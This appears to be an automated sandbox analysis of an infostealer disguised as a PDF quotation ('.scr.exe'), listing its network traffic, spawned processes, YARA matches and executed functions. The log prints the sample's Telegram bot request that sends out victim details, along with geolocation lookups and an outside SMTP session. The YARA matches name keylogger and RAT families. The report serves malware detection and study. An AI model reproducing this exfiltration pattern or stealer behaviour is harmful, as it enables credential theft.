2024-07-27 09:02:24 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-27 09:02:24 UTC	707	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOHqukuw7q0OvlXZIgXJ1%2B9K8TZ7VdJBIzBy0O4CdnQeXkZ2fRghOwziEEDXRDKsM6M7tDJ0Sgd%2B8Podkl0pfNG3355buA%2FnFVm%2F4VkNWkMV%2B4b2qCIK6nDJEgRwJM5RvnD63mlK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b734c6eba422f-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:27 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:02:27 UTC	703	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 16 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=II%2FWzOjdYy6Xk9NYK77FWgAyAzvAQHfq%2BBvNOp%2BPpqDlJpMfTI79ZrpfmNCQ4nhB5VjTKx5WdRRfiXL2yjX7bTNkBKC2RMWGZoOeqp5NAmU92hslr57CrKnNMKG5kkrjwpaJwejj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b735bdb144211-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:29 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:02:29 UTC	709	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 18 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNbQuN%2BCLnGfspGCjQQOfh%2FDUwYr1BQpp7ffYUjQU4hd0iXor4Z0NbcTEpdEmZPTQ7%2Bdx9Porhkq4pwCbH0qPX73GTo56waqnZXa1A8GO6wR%2FJiRX1Qnt8Imf%2BJiKhXzm%2FDT1HbO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b7369e94b433d-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49757	149.154.167.220	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:30 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-07-27 09:02:30 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 27 Jul 2024 09:02:30 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-27 09:02:30 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 27, 2024 11:02:37.586956978 CEST	587	49758	185.123.204.162	192.168.2.4	220-investms.vadavo.cloud ESMTP Exim 4.96.2 #2 Sat, 27 Jul 2024 11:02:37 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 27, 2024 11:02:37.589591980 CEST	49758	587	192.168.2.4	185.123.204.162	EHLO 367706
Jul 27, 2024 11:02:37.785376072 CEST	587	49758	185.123.204.162	192.168.2.4	250-investms.vadavo.cloud Hello 367706 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jul 27, 2024 11:02:37.785599947 CEST	49758	587	192.168.2.4	185.123.204.162	STARTTLS
Jul 27, 2024 11:02:37.987847090 CEST	587	49758	185.123.204.162	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	05:00:57
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe"
Imagebase:	0x13735d70000
File size:	580'608 bytes
MD5 hash:	2BBE097169A74646C685A1B024315626
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2346839728.0000013750CE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:00:58
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout 10
Imagebase:	0x7ff6cc930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:00:58
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:00:58
Start date:	27/07/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 10
Imagebase:	0x7ff7a73a0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:01:12
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout 10
Imagebase:	0x7ff6cc930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:01:12
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:01:12
Start date:	27/07/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 10
Imagebase:	0x7ff7a73a0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:02:05
Start date:	27/07/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Imagebase:	0x250e0360000
File size:	258'544 bytes
MD5 hash:	2EDD0B288FE2459DA84E4274D1942343
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.8%
Total number of Nodes:	78
Total number of Limit Nodes:	5

Executed Functions

Function 000001375093FB7A Relevance: 2.9, APIs: 2, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 000001375093FBED
VirtualAlloc.KERNEL32 ref: 000001375093FDE1

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 16871511b47f22afa49e1fb4eb1ca422c9da697110b78725263d216d5293395c
Instruction ID: 09b401c716d74b6606e2de5eaaa3cd718ecdb2b49e199111034ab8f083554fd5
Opcode Fuzzy Hash: 16871511b47f22afa49e1fb4eb1ca422c9da697110b78725263d216d5293395c
Instruction Fuzzy Hash: 2CC17970718D0D4BEB7EEA28C4E67EAB3D1FB94300F541569D84AC71DADB24DA42CB81

Function 00007FFD9BC1CA09 Relevance: 1.6, APIs: 1, Instructions: 144
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9BC1CAE4

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 90cc1d2584c977a91cbcb31370d2e804db14f57151322a52a26cd647d9e5a8e3
Instruction ID: 3bd94053692c05d0c13b432b48a72f0e21b5a1ee0521a36181b88af65592795c
Opcode Fuzzy Hash: 90cc1d2584c977a91cbcb31370d2e804db14f57151322a52a26cd647d9e5a8e3
Instruction Fuzzy Hash: 68414A70E08A4C8FDB58DFA8D855AEDBBF1FB69310F1041AAD049E7252DB74A985CB40

Function 00007FFD9BC0FCDD Relevance: 1.3, Instructions: 1321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5893200992a7b7330ac8f770341897de8c4f6cfb96b71d051d5c425e69a404d1
Instruction ID: 943fe5150bd61e9d6f5ae61ef5b22320c0b8fcaf7abe9f8a297224d4a1a81a05
Opcode Fuzzy Hash: 5893200992a7b7330ac8f770341897de8c4f6cfb96b71d051d5c425e69a404d1
Instruction Fuzzy Hash: 50822931B1DA4E4FEB78967884752B973E1FF94310B15427ED09EC32E6DE2CA9828740

Function 00007FFD9BC02529 Relevance: .9, Instructions: 875COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0f04cd7d5589d040757bd6e3e90e4f81b7b7a4575336122d43330a1aeba66b
Instruction ID: 02380d5d0fbb778d365a565c6ac8bf4c2ace0e75a769eb5d8e12687c501ecfbf
Opcode Fuzzy Hash: 5d0f04cd7d5589d040757bd6e3e90e4f81b7b7a4575336122d43330a1aeba66b
Instruction Fuzzy Hash: C1420631B19E0D4FEBA8DBA8846567973E1FF98310F51027DD48EC72A6DE24F9428780

Function 000001375093FF56 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b7360277d768ce2926303b843dd05fcc069c8092d023962182232a8f865f5d
Instruction ID: ec466028172e27fb714fc2d39e694a1be5e6a9f129f1ba7d0d789951eca8942c
Opcode Fuzzy Hash: 07b7360277d768ce2926303b843dd05fcc069c8092d023962182232a8f865f5d
Instruction Fuzzy Hash: 1BD14F71518B488BDB5ADF28C889AEA77E1FF98300F14466DE88AC7195DF30E541CB41

Function 000001375093EAE2 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000013750941392: LoadLibraryA.KERNEL32 ref: 0000013750941460

VirtualProtect.KERNEL32 ref: 000001375093EB5E
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,000001375093FD8C), ref: 000001375093EB87
VirtualProtect.KERNEL32 ref: 000001375093EBCC
VirtualProtect.KERNEL32 ref: 000001375093EBF0

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: dadfaa4f6e7ee51aaa0f627f978aea5514b1b6e95cd0236d2f8bc5a8e0e80d2e
Instruction ID: bc91385f4216b90d4a00ac3fea0523ec52d2ada5b9e787302c2820fa91e8ecbb
Opcode Fuzzy Hash: dadfaa4f6e7ee51aaa0f627f978aea5514b1b6e95cd0236d2f8bc5a8e0e80d2e
Instruction Fuzzy Hash: E131767171CA1C4BEB6EEE2998553EAB3D5E7C4720F14026DA85BC32CADF60DE0646C1

Function 000001375093EB51 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 000001375093EB5E
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,000001375093FD8C), ref: 000001375093EB87
VirtualProtect.KERNEL32 ref: 000001375093EBCC
VirtualProtect.KERNEL32 ref: 000001375093EBF0

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 00085e9ba0c165b87a9ed783f79145ec1eb2bd9b113ea21302685d362e64208b
Instruction ID: 2643831fc0377989638e32e14a3dd8776e0dadf61e64042cae3c0cfcc9792d7d
Opcode Fuzzy Hash: 00085e9ba0c165b87a9ed783f79145ec1eb2bd9b113ea21302685d362e64208b
Instruction Fuzzy Hash: E1215171B0CA184BEB6DAA5DA8553E9B3D5E7C8710F14016EA84BC32CADF24DD0646C1

Function 0000013750941392 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0000013750941460

Strings

l, xrefs: 00000137509413FA

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: e9cc61758bafa4d89ce62cbc84ee286cb122de1921f10c3296f7563f6d15d77b
Instruction ID: 3e39bf0fdc07aa78a49ef07a0dcfb3087061625ccce4f3eb09292d2effe69862
Opcode Fuzzy Hash: e9cc61758bafa4d89ce62cbc84ee286cb122de1921f10c3296f7563f6d15d77b
Instruction Fuzzy Hash: A931E77091CA854FE7AADF2CC044B61BBD5FBA9308F2856BCC0DAC31A7D724D5468701

Function 000001375093EC0E Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000013750941392: LoadLibraryA.KERNEL32 ref: 0000013750941460

VirtualProtect.KERNEL32 ref: 000001375093EC5C
VirtualProtect.KERNEL32 ref: 000001375093EC84

Memory Dump Source

Source File: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013750870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13750870000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: 9a13f96ffbd9251a3eacf255eabddcc5ef9f3992316a1a04cce6875ad6edcb2d
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: AF115231718A084BDBA9EF1898857AA77D5FB98700F444569A84AC72D9DF20DE4187C1

Function 00007FFD9BAE14A9 Relevance: 2.4, Strings: 1, Instructions: 1174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&)_H, xrefs: 00007FFD9BAE1653

Memory Dump Source

Source File: 00000000.00000002.2350760012.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bae0000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID: &)_H
API String ID: 0-3601193640
Opcode ID: be547a41dc42706a14cf2edc1c7a71cbf194b79e207659a4fa232b4d89a8e8a0
Instruction ID: abae30ea30aa8e1f28f981b076cb50daf14ea880f1266e041f9e4d480afdc967
Opcode Fuzzy Hash: be547a41dc42706a14cf2edc1c7a71cbf194b79e207659a4fa232b4d89a8e8a0
Instruction Fuzzy Hash: B6826071E1AA2E8FEF60DFA8C8A56E977F1FF68340F550179D009D31A1DA786981CB40

Function 00007FFD9BC1BDFD Relevance: 2.0, APIs: 1, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2351949675.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc00000_QUOTATION_JULQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a367292f69b1d37ac23041ff1a2c5d45eb3d859947896c37b8971384b02880
Instruction ID: e7c0884651fb4b363f124cc4dac4236db25c2066aa8bdd838055e63251ce4be1
Opcode Fuzzy Hash: 42a367292f69b1d37ac23041ff1a2c5d45eb3d859947896c37b8971384b02880
Instruction Fuzzy Hash: 34E16C70A08A8D8FDBB8DF68C8557E937E0FF19311F10512AE84EDB291DB749684CB41

Function 00007FFD9BC1BE69 Relevance: 2.0, APIs: 1, Instructions: 453
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32 ref: 00007FFD9BC1C257

Memory Dump Source

